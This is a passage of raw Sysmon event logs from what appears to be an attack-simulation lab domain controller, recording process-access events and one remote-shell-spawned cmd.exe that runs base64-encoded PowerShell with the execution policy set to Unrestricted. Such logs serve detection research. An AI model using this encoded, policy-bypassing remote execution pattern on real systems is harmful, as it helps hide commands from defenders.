06:01:11.669","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8342,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8343,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8344,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.683\r\nProcessGuid: {A837DB8D-0527-5F25-0000-00100DC71300}\r\nProcessId: 3356\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0527-5F25-0000-002012C41300}\r\nLogonId: 0x13C412\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0527-5F25-0000-001049C41300}\r\nParentProcessId: 4680\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.683","ProcessGuid":"{A837DB8D-0527-5F25-0000-00100DC71300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0527-5F25-0000-002012C41300}","LogonId":"0x13c412","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0527-5F25-0000-001049C41300}","ParentProcessId":"4680","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8345,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-0527-5F25-0000-001049C41300}\r\nSourceProcessId: 4680\r\nSourceThreadId: 4332\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-00100DC71300}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-0527-5F25-0000-001049C41300}","SourceProcessId":"4680","SourceThreadId":"4332","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-00100DC71300}","TargetProcessId":"3356","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8346,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-00100DC71300}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-00100DC71300}","TargetProcessId":"3356","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
